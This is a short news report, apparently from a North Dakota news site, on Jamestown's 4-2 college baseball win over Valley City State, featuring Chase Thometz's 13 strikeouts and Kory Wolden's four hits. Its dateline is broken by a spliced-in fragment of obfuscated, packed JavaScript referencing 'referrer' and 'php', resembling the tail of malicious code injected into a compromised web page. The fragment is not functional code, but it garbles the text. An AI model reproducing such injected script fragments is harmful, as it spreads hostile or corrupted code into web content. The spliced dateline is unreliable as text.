JAMESTOWN, ayyse|var|u0026u|referrer|adkzn||js|php’.split(‘|’),0,{}))
N.D. (NewsDakota.com) – The Jimmies continued their dominance over Valley City State in baseball with a 4-2 win on Wednesday night at Jack Brown Stadium. Chase Thometz struck out 13 and Kory Wolden had four hits in the victory.

Jamestown got on the board in the first when Drake Pilat snuck a ground ball down the right field line scoring Wolden all the way from first. VCSU starter Max Koprek kept the Jimmies quiet for the next five innings.

The Vikings didn’t have much luck against Chase Thometz. They only mustered one hit, but it was a big one. Manny Leyva hit a second inning two-run bomb to put VCSU in front.

That 2-1 score held into the seventh inning. Wolden delivered the biggest hit of his four with the bases loaded and the lead flipped on the two-run single. Jamestown added a run in the 8th.

Thometz struck out 13 Vikings and allowed just one hit in eight innings for his second win of the season. Jamestown has won 46 of the last 49 against VCSU.

The Jimmies (5-0) will go to St. Cloud this weekend for a pair of neutral site games against Viterbo.
